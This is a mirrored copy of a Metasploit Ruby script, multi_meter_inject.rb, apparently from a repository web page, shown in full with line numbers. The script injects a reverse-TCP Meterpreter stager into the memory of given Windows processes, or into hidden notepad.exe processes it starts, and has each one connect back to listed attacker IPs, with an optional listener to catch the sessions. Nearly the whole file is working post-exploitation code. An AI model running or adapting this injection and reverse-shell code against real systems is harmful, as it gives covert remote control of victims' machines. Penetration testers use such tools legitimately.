Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

multi_meter_inject.rb 5.2KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151
  1. ##
  2. # WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
  3. # If you'd like to improve this script, please try to port it as a post
  4. # module instead. Thank you.
  5. ##
  6. # Author: Carlos Perez at carlos_perez[at]darkoperator.com
  7. #-------------------------------------------------------------------------------
  8. ################## Variable Declarations ##################
  9. @client = client
  10. lhost = Rex::Socket.source_address("1.2.3.4")
  11. lport = 4444
  12. lhost = "127.0.0.1"
  13. pid = nil
  14. multi_ip = nil
  15. multi_pid = []
  16. payload_type = "windows/meterpreter/reverse_tcp"
  17. start_handler = nil
  18. @exec_opts = Rex::Parser::Arguments.new(
  19. "-h" => [ false, "Help menu." ],
  20. "-p" => [ true, "The port on the remote host where Metasploit is listening (default: 4444)."],
  21. "-m" => [ false, "Start exploit/multi/handler for return connection."],
  22. "-P" => [ true, "Specify reverse connection Meterpreter payload. Default: windows/meterpreter/reverse_tcp"],
  23. "-I" => [ true, "Provide multiple IP addresses for connections separated by comma."],
  24. "-d" => [ true, "Provide multiple PID for connections separated by comma one per IP."]
  25. )
  26. meter_type = client.platform
  27. ################## Function Declarations ##################
  28. # Usage Message Function
  29. #-------------------------------------------------------------------------------
  30. def usage
  31. print_line "Meterpreter script for injecting a reverce tcp Meterpreter payload"
  32. print_line "in to memory of multiple PIDs. If none is provided, a notepad process"
  33. print_line "will be created and a Meterpreter payload will be injected in to each."
  34. print_line(@exec_opts.usage)
  35. raise Rex::Script::Completed
  36. end
  37. # Wrong Meterpreter Version Message Function
  38. #-------------------------------------------------------------------------------
  39. def wrong_meter_version(meter = meter_type)
  40. print_error("#{meter} version of Meterpreter is not supported with this script!")
  41. raise Rex::Script::Completed
  42. end
  43. # Function for injecting payload in to a given PID
  44. #-------------------------------------------------------------------------------
  45. def inject(target_pid, payload_to_inject)
  46. print_status("Injecting meterpreter into process ID #{target_pid}")
  47. begin
  48. host_process = @client.sys.process.open(target_pid.to_i, PROCESS_ALL_ACCESS)
  49. raw = payload_to_inject.generate
  50. mem = host_process.memory.allocate(raw.length + (raw.length % 1024))
  51. print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager")
  52. print_status("Writing the stager into memory...")
  53. host_process.memory.write(mem, raw)
  54. host_process.thread.create(mem, 0)
  55. print_good("Successfully injected Meterpreter in to process: #{target_pid}")
  56. rescue::Exception => e
  57. print_error("Failed to Inject payload to #{target_pid}!")
  58. print_error(e)
  59. end
  60. end
  61. # Function for creation of connection handler
  62. #-------------------------------------------------------------------------------
  63. def create_multi_handler(payload_to_inject)
  64. mul = @client.framework.exploits.create("multi/handler")
  65. mul.share_datastore(payload_to_inject.datastore)
  66. mul.datastore['WORKSPACE'] = @client.workspace
  67. mul.datastore['PAYLOAD'] = payload_to_inject
  68. mul.datastore['EXITFUNC'] = 'process'
  69. mul.datastore['ExitOnSession'] = true
  70. print_status("Running payload handler")
  71. mul.exploit_simple(
  72. 'Payload' => mul.datastore['PAYLOAD'],
  73. 'RunAsJob' => true
  74. )
  75. end
  76. # Function for creating the payload
  77. #-------------------------------------------------------------------------------
  78. def create_payload(payload_type,lhost,lport)
  79. print_status("Creating a reverse meterpreter stager: LHOST=#{lhost} LPORT=#{lport}")
  80. payload = payload_type
  81. pay = client.framework.payloads.create(payload)
  82. pay.datastore['LHOST'] = lhost
  83. pay.datastore['LPORT'] = lport
  84. return pay
  85. end
  86. # Function starting notepad.exe process
  87. #-------------------------------------------------------------------------------
  88. def start_proc()
  89. print_good("Starting Notepad.exe to house Meterpreter session.")
  90. proc = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true })
  91. print_good("Process created with pid #{proc.pid}")
  92. return proc.pid
  93. end
  94. ################## Main ##################
  95. @exec_opts.parse(args) { |opt, idx, val|
  96. case opt
  97. when "-h"
  98. usage
  99. when "-p"
  100. lport = val.to_i
  101. when "-m"
  102. start_handler = true
  103. when "-P"
  104. payload_type = val
  105. when "-I"
  106. multi_ip = val.split(",")
  107. when "-d"
  108. multi_pid = val.split(",")
  109. end
  110. }
  111. # Check for version of Meterpreter
  112. wrong_meter_version(meter_type) if meter_type != 'windows'
  113. # Create a exploit/multi/handler if desired
  114. create_multi_handler(payload_type) if start_handler
  115. # Check to make sure a PID or program name where provided
  116. if multi_ip
  117. if multi_pid
  118. if multi_ip.length == multi_pid.length
  119. pid_index = 0
  120. multi_ip.each do |i|
  121. payload = create_payload(payload_type,i,lport)
  122. inject(multi_pid[pid_index],payload)
  123. select(nil, nil, nil, 5)
  124. pid_index = pid_index + 1
  125. end
  126. else
  127. multi_ip.each do |i|
  128. payload = create_payload(payload_type,i,lport)
  129. inject(start_proc,payload)
  130. select(nil, nil, nil, 2)
  131. end
  132. end
  133. end
  134. else
  135. print_error("You must provide at least one IP!")
  136. end